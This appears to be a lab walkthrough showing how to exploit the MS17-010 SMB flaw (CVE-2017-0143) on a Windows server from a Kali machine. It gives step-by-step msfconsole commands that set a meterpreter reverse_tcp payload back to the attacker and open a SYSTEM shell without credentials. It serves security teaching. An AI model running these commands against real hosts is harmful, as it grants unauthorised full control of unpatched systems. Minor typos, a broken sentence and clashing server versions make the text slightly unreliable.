- Metaspoit Framework
- Workstation (Windows 10)
- TargetWindows01 (Windows Server 2019)
- Kali (Linux)
From the TargetWindows01 taskbar, Start button > type winver > press Enter to open the About Windows dialog box:
Go to https://cve.mitre.org/ > search for Windows 1607 remote code execution > look for CVE-2017-0143 in the list:
Now we are going to see if The > search for microsoft bulletin ms17-010 > open the frist Microsoft blog
Go to https://www.rapid7.com/db/ > search ms17-010 > open the frist one
Go to Kali > Log in > open Terminal:
Type msfconsole and press enter
After the prompt appears, type: use exploit/windows/smb/ms17_010_psexec
type: set rhosts 172.30.0.3 > press enter
This command sets the remote host we want to exploit. In this example, it is Windows Server 2016.
type: set payload windows/meterpreter/reverse_tcp > press enter
This command determines the payload, which is executed right after successful exploitation.
type: set lhost 172.30.0.4 > press enter
This command specifies the local IP address that will be ready for connections on the attacker's computer.
type: set lport 443 > press enter
This command sets the local port that will be ready for connections on the attacker's computer. After the exploit is executed, the payload code will let Windows Server 2016 connect to the attacker's machine by using this port
type: exploit > press enter
This command sends the exploit module to the target system.
type: shell > press enter
This command allows us to use cmd.exe over meterpreter, meaning that you have now opened a remote shell on TargetWindows01 with the System account. Please note that you didn't need a username or password to do this.